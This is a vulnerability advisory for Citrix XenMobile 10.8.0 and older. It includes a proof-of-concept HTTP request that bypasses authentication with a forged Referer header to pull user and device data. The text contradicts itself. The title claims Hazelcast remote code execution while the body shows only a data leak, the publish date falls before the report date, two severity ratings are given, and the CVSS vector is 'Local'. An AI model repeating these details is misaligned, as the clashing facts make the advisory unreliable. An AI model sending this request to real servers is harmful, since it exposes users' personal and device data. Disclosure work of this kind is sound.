Advisory

XenMobile contains a vulnerable version of Hazelcast, remote code execution via object serialisation

Proof of concept

Data about users and devices, including email addresses and IMEI identifiers, can be obtained without authentication by making API calls:

    GET /zdm/rs/xdmServices/autoAction/execution/list HTTP/1.1
    Host: xenmobile.example.com
    Referer: https://xenmobile.example.com/zdm/cxf/xdmServices/login.jsp

XenMobile will return data which includes the following information about each user:

    actionData, activationDate, createdDate, deviceId, deviceImei, deviceSerial, id, model, osFamily, provisioningId, status, triggerData, userName

This is possible because XenMobile uses the Referer header to control access to the API. However, this header is fully under the attacker's control, so it is an ineffective authentication mechanism.

Mitigation/further actions

  1. Explore whether it is possible to require effective authentication before accessing this type of information
  2. Remove public access to this service by moving it inside your network and configuring mobile devices to access it via a VPN or proxy that requires authentication
  3. Install an update rectifying this issue as soon as one is available

Advisory timeline

  1. 2018-03-28 – Reported to Citrix and acknowledged immediately
  2. 2018-05-21 – Issue reported fixed

CVSS

Base score: 9.3
Attack vector: Local
Attack complexity: Low
Privileges required: None
User interaction: None
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High

Metadata

  • Severity
    Critical (base score 9.3)
  • Discovered by
    Glyn Wintle
  • Severity
    High
  • Advisory ID
    dxw-2018-3590
  • CVE
    CVE-2018-10654
  • Component/package
    XenMobile
  • Version
    10.8.0 and older versions
  • Published
    2018-03-26